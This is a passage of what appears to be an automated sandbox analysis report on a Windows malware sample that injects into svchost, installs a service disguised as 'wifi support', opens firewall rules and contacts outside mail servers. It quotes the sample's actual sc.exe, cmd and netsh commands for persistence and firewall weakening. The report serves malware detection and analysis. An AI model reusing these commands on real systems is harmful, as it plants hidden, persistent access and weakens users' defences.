        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: 874A7cigvX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

        Data Obfuscation

        Source: C:\Users\user\Desktop\874A7cigvX.exe | Unpacked PE file: 0.2.874A7cigvX.exe.400000.0.unpack .text:ER;.data:W;.yey:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Unpacked PE file: 12.2.xvkslbws.exe.400000.0.unpack .text:ER;.data:W;.yey:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Unpacked PE file: 0.2.874A7cigvX.exe.400000.0.unpack
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Unpacked PE file: 12.2.xvkslbws.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr | 0_2_00406069
        Source: 874A7cigvX.exe | Static PE information: section name: .yey
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_0267C34E push 0000002Bh; iretd | 0_2_0267C354
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Code function: 12_2_02635776 push 0000002Bh; iretd | 12_2_0263577C
        Source: 874A7cigvX.exe | Static PE information: section name: .text entropy: 7.609251717911276

        Persistence and Installation Behavior

        Source: unknown | Executable created and started: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
        Source: C:\Users\user\Desktop\874A7cigvX.exe | File created: C:\Users\user\AppData\Local\Temp\xvkslbws.exe
        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe (copy)
        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe (copy)
        Source: C:\Windows\SysWOW64\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ycgeofkw
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep | 0_2_00409A6B
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support"

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\SysWOW64\svchost.exe | File deleted: c:\users\user\desktop\874a7cigvx.exe
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00401000
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary | 15_2_030F199C
        Source: C:\Windows\SysWOW64\svchost.exe TID: 3332 | Thread sleep count: 40 > 30
        Source: C:\Windows\SysWOW64\svchost.exe TID: 3332 | Thread sleep time: -40000s >= -30000s
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount | 0_2_00401D96
        Source: svchost.exe, 0000000F.00000002.3299943698.0000000003400000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr | 0_2_00406069
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_0261092B mov eax, dword ptr fs:[00000030h] | 0_2_0261092B
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_02610D90 mov eax, dword ptr fs:[00000030h] | 0_2_02610D90
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_02678943 push dword ptr fs:[00000030h] | 0_2_02678943
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Code function: 12_2_02631D6B push dword ptr fs:[00000030h] | 12_2_02631D6B
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Code function: 12_2_02D7092B mov eax, dword ptr fs:[00000030h] | 12_2_02D7092B
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Code function: 12_2_02D70D90 mov eax, dword ptr fs:[00000030h] | 12_2_02D70D90
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_0040EBCC GetProcessHeap,RtlAllocateHeap | 0_2_0040EBCC
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep | 0_2_00409A6B
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Code function: 12_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep | 12_2_00409A6B
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_030F9A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep | 15_2_030F9A6B

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 217.69.139.150 25
        Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 77.232.41.29 443
        Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 52.101.42.0 25
        Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 64.233.166.26 25
        Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 67.195.204.74 25
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 30F0000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 30F0000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 30F0000
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F18008
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ycgeofkw\
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xvkslbws.exe" C:\Windows\SysWOW64\ycgeofkw\
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support"
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" description ycgeofkw "wifi internet conection"
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ycgeofkw
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree | 0_2_00407809
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid | 0_2_00406EDD
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle | 0_2_0040405E
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_0040EC54 GetSystemTimeAsFileTime,GetVolumeInformationA,GetTickCount | 0_2_0040EC54
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree | 0_2_00407809
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_0040B211 FileTimeToSystemTime,GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,SystemTimeToFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA | 0_2_0040B211
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00409326 GetVersionExA,GetModuleHandleA,GetModuleFileNameA,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey | 0_2_00409326

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

        Stealing of Sensitive Information

        Source: Yara match | File source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: 874A7cigvX.exe PID: 2796, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: xvkslbws.exe PID: 1440, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6204, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match | File source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: 874A7cigvX.exe PID: 2796, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: xvkslbws.exe PID: 1440, type: MEMORYSTR
